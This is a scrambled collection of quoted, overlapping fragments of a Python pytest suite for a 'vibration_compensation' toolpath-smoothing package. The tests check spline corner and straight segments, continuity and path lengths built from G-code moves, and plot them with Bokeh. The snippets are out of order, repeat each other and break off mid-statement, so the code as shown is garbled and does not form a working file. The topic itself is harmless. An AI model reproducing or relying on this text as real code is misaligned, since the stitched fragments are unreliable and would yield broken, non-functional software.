"= data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data = generate_curves([",
"end): checker = SegmentChecker(data, l, s, start, end, True) checker.check_corner_spline_order() if start ==",
"\"G1 X20 Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"start, end, True) checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on() elif start == \"middle\":",
"points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1],",
"start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert",
"prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\ \"The previous segment does not",
"closest point of the corner is not close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point",
"check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self):",
"checker.check_corner_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0,",
"1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def",
"data = generate_curves([ \"G1 X50 Y50\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"\\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data = generate_curves([",
"Y100\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0,",
"end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2,",
"def check_point_on_middle_of_line(self): msg = \"The middle point of the spline segment is not",
"self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg = \"The start point of the spline segment",
"data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 X0 Y100\" ],",
"else: assert False, \"Invalid end type\" checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(),",
"100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100 Y-100\", \"G1",
"data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath if",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data",
"l < data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1]",
"self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end point of the spline",
"np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb, point): mid = (lineb - linea) *",
"checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity()",
"straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert",
"= generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data",
"on the middle of the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) ==",
"False, \"Invalid start type\" if start == \"start\" and end == \"end\": checker.check_point_on_middle_of_line()",
"SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s, start, end): checker = SegmentChecker(data, l,",
"Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data,",
"def corner_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s, start, end,",
"line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return plot def point_on_line(linea,",
"abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0",
"==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s, start, end):",
"start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert",
"data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l +",
"line_dist = self.start_line_dist + self.line_length * line else: line_dist = self.start_next_line_dist + self.next_line_length",
"end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1])",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") # Note that",
"assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point",
"+ self.line_length * line else: line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0) assert",
"== \"end\": checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle()",
"point of the spline segment is not on the line\" assert point_on_line(self.start_point, self.end_point,",
"1.0: line_dist = self.start_line_dist + self.line_length * line else: line_dist = self.start_next_line_dist +",
"return np.linalg.norm(point - mid) class SegmentChecker(object): def __init__(self,data, l, s, start, end, corner):",
"straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200,",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter):",
"plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20 Y0\", \"G1 X30 Y-0.1\" ],",
"np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100 Y-100\",",
"def straight_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s, start, end,",
"the spline segment is not on the middle of the line\" assert point_on_middle_of_line(self.start_point,",
"SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle",
"as sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures(): path, filename = os.path.split(os.path.realpath(__file__))",
"assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert",
"self.s = s self.start = start self.end = end self.start_point = data.start_xy[l] self.end_point",
"start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data,",
"if start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() else: assert False,",
"plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y1\" ],",
"line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0) assert self.spline.distance(spline) <= line_dist and \\",
"middle point of the spline segment is not on the middle of the",
"l, s, start, end, True) checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on() elif start",
"s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\")",
"line <= 1.0: line_dist = self.start_line_dist + self.line_length * line else: line_dist =",
"vibration_compensation import read_gcode, Data import pytest from numpy.testing import * import numpy as",
"100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1)",
"self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment end distance and the",
"pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50 Y50\", \"G1",
"+ np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100",
"msg = \"The start point of the spline segment does not match the",
"X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"\"The start point of the spline segment is not on the end of",
"assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 +",
"the corner spline is before the line segment end\" corner_error = \"The closest",
"== 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data,",
"False, \"Invalid end type\" checker.check_continuity() def corner_segment(data, l, s, start, end): checker =",
"X20 Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"\"G1 X100 Y0\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"/ 2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length =",
"corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <",
"corner is not close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\",
"elif start == \"middle\": checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end() else: assert False,",
"self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg = \"The middle point of the spline segment",
"point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg = \"The end",
"def check_line_start_point_middle(self): msg = \"The start point of the spline segment is not",
"Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data,",
"def point_on_middle_of_line(linea, lineb, point): mid = (lineb - linea) * 0.5 + linea",
"generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert",
"end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"the end of the spline segment\" if self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1]",
"\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s, start, end): checker = SegmentChecker(data,",
"end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" )",
"point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end point of the",
"= data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0 self.spline_end",
"end where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start)",
"s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2])",
"spline start distance does not match\" if line <= 1.0: line_dist = self.start_line_dist",
"l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300,",
"generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01) assert",
"== \"middle\": checker.check_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def corner_segment(data, l,",
"+ np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100",
"current segment start do not match up\" def check_corner_spline_order(self): assert self.spline_end > self.spline_mid,",
"err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\",
"def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01)",
"1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1",
"import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures(): path, filename = os.path.split(os.path.realpath(__file__)) path =",
"== pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg = \"There's a discontinuity",
"corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <",
"self.end_point = data.end_xy[l] if l != data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1] self.next_end_point",
"\"G1 X-100 Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"segment start do not match up\" def check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\",
"* import numpy as np import scipy as sp import vibration_compensation.bokeh_imports as plt",
"== pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self): msg = \"The start point of",
"X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\")",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2,",
"point of the spline segment is not on the line\" def check_end_point_on(self): assert",
"X10 Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\",",
"self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg = \"The middle point of the spline segment",
"\"end\": checker.check_line_start_point_end() else: assert False, \"Invalid start type\" if start == \"start\" and",
"10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 +",
"\"Invalid start type\" if start == \"middle\" or end == \"middle\": checker.check_corner_middle_normal() else:",
"start point of the spline segment does not match the line start point\"",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100",
"distance and the current segment start do not match up\" def check_corner_spline_order(self): assert",
"checker.check_continuity() def corner_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s, start,",
"lineb) def point_on_middle_of_line(linea, lineb, point): mid = (lineb - linea) * 0.5 +",
"+ np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data)",
"line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg = \"The",
"1: self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner: self.spline_start",
"end point of the spline segment is not on the line\" def check_end_point_on(self):",
"3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0,",
"l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\",",
"X100 Y0\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"plot def point_on_line(linea, lineb, point): return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\\",
"def plot(data: Data): p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True,",
"\"G1 X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\",",
"self.line_length = xy_lengths[l] if l < data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist +",
"endpoint of the corner spline is before the line segment end\" corner_error =",
"1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid =",
"\"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 Z10\", \"G1 X0 Y100\" ], maximum_error=0.01)",
"== \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment end distance and the current",
"SegmentChecker(data, l, s, start, end, True) checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on() elif",
"X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\")",
"check_distances(data) plotter(data) def test_three_long_lines(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\",",
"s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert",
"corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3,",
"maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\",
"self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy",
"pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def test_90_corner(plotter): data =",
"= self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self, spline, line): msg =",
"= \"The middle point of the spline segment is not on the middle",
"l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data)",
"2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"= \"The start point of the spline segment is not on the middle",
"pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1",
"np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20 Y0\",",
"\"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end() else:",
"self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid =",
"\"Invalid end type\" checker.check_continuity() def corner_segment(data, l, s, start, end): checker = SegmentChecker(data,",
"l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter):",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data = generate_curves([ \"G1",
"generate_curves([ \"G1 X50 Y50\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2",
"points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p)",
"distance does not match\" if line <= 1.0: line_dist = self.start_line_dist + self.line_length",
"not on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0,",
"0.5) def check_line_start_point_end(self): msg = \"The start point of the spline segment is",
"self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\ \"The previous segment does not end where",
"segment\" if self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\",
"mid = (lineb - linea) * 0.5 + linea return np.linalg.norm(point - mid)",
"line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end point",
"np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([",
"data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\")",
"l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1)",
"= SegmentChecker(data, l, s, start, end, False) if start == \"start\": checker.check_start_point_start() elif",
"end\" corner_error = \"The closest point of the corner is not close enough\"",
"\"G1 X100 Y100\", \"G1 Z10\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100",
"1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid,",
"SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle =",
"== \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data =",
"assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 +",
"\"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end == \"end\": checker.check_end_point_end() elif end == \"on\":",
"the line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment",
"end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data",
"l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\",",
"start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50,",
"== 2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert",
"end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50])",
"plotter(data) def test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y1\" ],",
"\\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment end distance and",
"Y0\", \"G1 X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"# Note that this line is very short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\")",
"end): checker = SegmentChecker(data, l, s, start, end, False) if start == \"start\":",
"X100 Y0\", \"G1 X100 Y100\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg = \"The end point of",
"== \"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def check_distances(data): t",
"<= line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self): msg",
"= data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l",
"== pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg = \"The start point",
"- point)\\ - np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb, point): mid = (lineb",
"does not match the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def",
"end == \"middle\": checker.check_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def corner_segment(data,",
"1.5) def check_continuity(self): msg = \"There's a discontinuity at the end of the",
"line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def",
"def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01)",
"checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() else: assert",
"\"G1 X100 Y100\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data,",
